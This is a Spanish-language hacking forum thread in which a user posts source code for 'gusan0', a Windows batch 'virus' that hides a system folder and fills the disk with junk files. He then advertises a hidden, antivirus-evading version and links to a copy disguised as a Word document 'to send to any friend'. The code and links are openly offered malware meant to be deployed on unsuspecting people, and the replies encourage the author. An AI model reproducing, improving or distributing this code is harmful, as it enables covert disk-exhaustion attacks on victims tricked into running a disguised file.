Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: **Aincrad** en 10 Junio 2017, 19:37 pm



Título: virus A.T. gusan0 en bat
Publicado por: **Aincrad** en 10 Junio 2017, 19:37 pm
hola soy S4L.
este es mi virus de gusan0 v0.1:

Código
  1. @echo off
  2. md "C:\gusan0"
  3. attrib +s +h "C:\gusan0"
  4. :main
  5. for %%a in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  6. for %%b in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  7. for %%c in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  8. for %%d in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  9. for %%e in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  10. for %%f in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  11. for %%g in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  12. for %%h in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  13. for %%i in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  14. for %%j in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  15. for %%k in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  16. for %%l in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  17. for %%m in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  18. for %%n in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  19. for %%o in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  20. for %%p in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  21. for %%q in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  22. for %%r in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  23. for %%s in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  24. for %%t in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  25. for %%u in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  26. for %%v in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  27. for %%w in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  28. for %%x in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  29. for %%y in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  30. for %%z in (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (
  31. call :comp %%a%%b%%c%%d%%e%%f%%g%%h%%i%%j%%k%%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z
  32. )
  33. set c=1
  34. )
  35. set c=2
  36. )
  37. set c=3
  38. )
  39. set c=4
  40. )
  41. set c=5
  42. )
  43. set c=6
  44. )
  45. set c=7
  46. )
  47. set c=8
  48. )
  49. set c=9
  50. )
  51. set c=10
  52. )
  53. set c=11
  54. )
  55. set c=12
  56. )
  57. set c=13
  58. )
  59. set c=14
  60. )
  61. set c=15
  62. )
  63. set c=16
  64. )
  65. set c=17
  66. )
  67. set c=18
  68. )
  69. set c=19
  70. )
  71. set c=20
  72. )
  73. set c=21
  74. )
  75. set c=22
  76. )
  77. set c=23
  78. )
  79. set c=24
  80. )
  81. set c=25
  82. )
  83.  
  84. :comp
  85. echo %*
  86. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>C:\gusan0\%*
  87. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>>C:\gusan0\%*
  88. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>>C:\gusan0\%*
  89. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>>C:\gusan0\%*
  90. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>>C:\gusan0\%*
  91. echo by sal xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>>C:\gusan0\%*

hola a todos .

he hecho la version 0.2.

ventajas de esta nueva version:

*el virus es indetectablea a los antivirus.

*llena por cada 20 segundos 1gb del disco duro.

*se abre el vbs scrip y se ejecuta oculto y el usuario no se da cuenta del que el virus esta en funcionamiento.

-desventajas: el virus consta de 3 archivos (1 .bat y 2 .vbs)

link del virus en la version 0.2:

http://www.mediafire.com/file/98wwan4f36s8w47/virus+A.T.+v0.4+gusan0.rar

link del virus , disfrasado como un documento word listo para enviar a cualquier amigo o persona:

http://www.mediafire.com/file/mca4o2kclaxvaeu/tarea.exe



Título: Re: virus A.T. gusan0 en bat
Publicado por: Borito30 en 11 Junio 2017, 01:06 am
Te falta darle mas caña salu2 :) se agradece


Título: Re: virus A.T. gusan0 en bat
Publicado por: engel lex en 11 Junio 2017, 02:21 am
Citar
*llena por cada 20 segundos 1gb del disco duro.

depende de muchos factores... por otro lado en este foro ya se habìa hablado de como llenar el disco de manera instantanea, revisa por allí, se basa en crear archivos en blanco